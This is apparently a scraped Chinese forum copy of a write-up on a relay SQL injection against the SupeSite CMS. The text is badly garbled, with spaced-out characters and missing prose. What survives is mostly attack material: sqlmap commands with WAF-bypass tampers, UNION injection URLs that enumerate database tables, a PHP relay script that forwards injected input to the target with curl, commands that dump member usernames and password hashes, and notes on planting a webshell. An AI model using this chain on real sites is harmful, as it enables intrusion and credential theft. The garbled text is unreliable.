[16468] 2021-02-21_记一次针对SupeSite的中转注入实战

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-02-21_记一次针对SupeSite的中转注入实战 S u p e S i t e   w i n d c c t v   F r e e B u f   2 0 2 1 - 0 2 - 2 1 s q l m a p 使 S Q L w a f m y s q l 4 . 0 m y s q l i n f o r m a t i o n _ s c h e m a . t a b l e s s q l m a p s q l m a p s q l m a p s q l m a p   - u   h t t p : / / w w w . x x x x x . c o m / b a t c h . c o m m o n . p h p ? a c t i o n = m o d e l q u o t e & c i d = 1 & n a m e = s p a c e c o m m e n t s   - v   3   d b m s = m y s q l   t a m p e r = s p a c e 2 c o m m e n t   r i s k = 3   l e v e l = 5   r a n d o m - a g e n t   d b s   b a t c h s q l m a p p h p s u t d y s q l . p h p h t t p : / / w w w . x x x x x . c o m / b a t c h . c o m m o n . p h p ? a c t i o n = m o d e l q u o t e & c i d = 1 & n a m e = s p a c e c o m m e n t s % 2 0 o r d e r % 2 0 b y % 2 0 x x x % 2 3 h t t p : / / w w w . x x x x . c o m / b a t c h . c o m m o n . p h p a c t i o n = m o d e l q u o t e & c i d = 1 & n a m e = s p a c e c o m m e n t s % 2 0 w h e r e % 2 0 1 = 2 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , 2 , 3 , 4 , 5 , , 7 , 8 , 9 , 1 0 , 1 1 , 1 2 % 2 3   h t t p : / / w w w . x x x x x . c o m / b a t c h . c o m m o n . p h p ? a c t i o n = m o d e l q u o t e & c i d = 1 & n a m e = s p a c e c o m m e n t s % 2 0 w h e r e % 2 0 1 = 2 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 1 0 , 1 1 , d a t a b a s e ( ) % 2 3   h t t p : / / w w w . x x x x x . c o m / b a t c h . c o m m o n . p h p ? a c t i o n = m o d e l q u o t e & c i d = 1 & n a m e = s p a c e c o m m e n t s % 2 0 w h e r e % 2 0 1 = 2 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 1 0 , 1 1 , ( s e l e c t % 2 0 g r o u p _ c o n c a t ( t a b l e _ n a m e ) % 2 0 f r o m % 2 0 i n f o r m a t i o n _ s c h e m a . t a b l e s % 2 0 w h e r e % 2 0 t a b l e _ s c h e m a = d a t a b a s e ( ) ) % 2 3 < ? p h p s e t _ t i m e _ l i m i t ( 0 ) ;   $ i d = $ _ G E T [ " i d " ] ;   $ i d = s t r _ r e p l a c e ( "   " , " % 2 0 " , $ i d ) ;   $ i d = s t r _ r e p l a c e ( " = " , " % 3 D " , $ i d ) ;  
s q l m a p s q l m a p   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / s q l . p h p ? i d = 1   d b m s = m y s q l   t i m e - s e c   5   d b s D i s c u z s q l m a p   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / s q l . p h p ? i d = 1   d b m s = m y s q l   t i m e - s e c   5   - D   D i s c u z   t a b l e s m y s q l D i s c u z D i s c u z $ u r l   =   " h t t p : / / w w w . x x x x x . c o m / b a t c h . c o m m o n . p h p ? a c t i o n = m o d e l q u o t e & c i d = 1 & n a m e = s p a c e c o m m e n t s % 2 0 w h e r e % 2 0 1 = $ i d % 2 3 " ; e c h o   $ u r l ; $ c h   =   c u r l _ i n i t ( ) ;   c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ U R L ,   " $ u r l " ) ;   c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ R E T U R N T R A N S F E R ,   1 ) ;   c u r l _ s e t o p t ( $ c h ,   C U R L O P T _ H E A D E R ,   0 ) ; $ o u t p u t   =   c u r l _ e x e c ( $ c h ) ;   c u r l _ c l o s e ( $ c h ) ;   p r i n t _ r ( $ o u t p u t ) ; ? >
s q l m a p s q l m a p   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / s q l . p h p ? i d = 1   d b m s = m y s q l   t i m e - s e c   5   - D   D i s c u z   - T   c d b _ m e m b e r s   c o l u m n s
m d 5 s q l m a p   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / s q l . p h p ? i d = 1   d b m s = m y s q l   t i m e - s e c   5   - D   D i s c u z   - T   c d b _ m e m b e r s   - C   u s e r n a m e , p a s s w o r d d u m p s h e l l w e b s h e l l S u p e S i t e < ? e x i t ? > p h p w e b s h e l l z i p z i p w e b s h e l l
c o n f i g . p h p a d m i n e r . p h p 访 a d m i n e r p h p 便 s q l s q l c e n t o s s q l w i n d o w s n a v i c a t k a l i 1 m y s q l > c r e a t e   d a t a b a s e   D i s c u z ;
2 1 m y s q l > u s e   D i s c u z ; 2 m y s q l > s e t   n a m e s   u t f 8 ; 3 s q l m y s q l > s o u r c e   / h o m e / D i s c u z . s q l ; 1 w e b s h e l l v p s 2 3 4 s q l m a p s h e l l

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则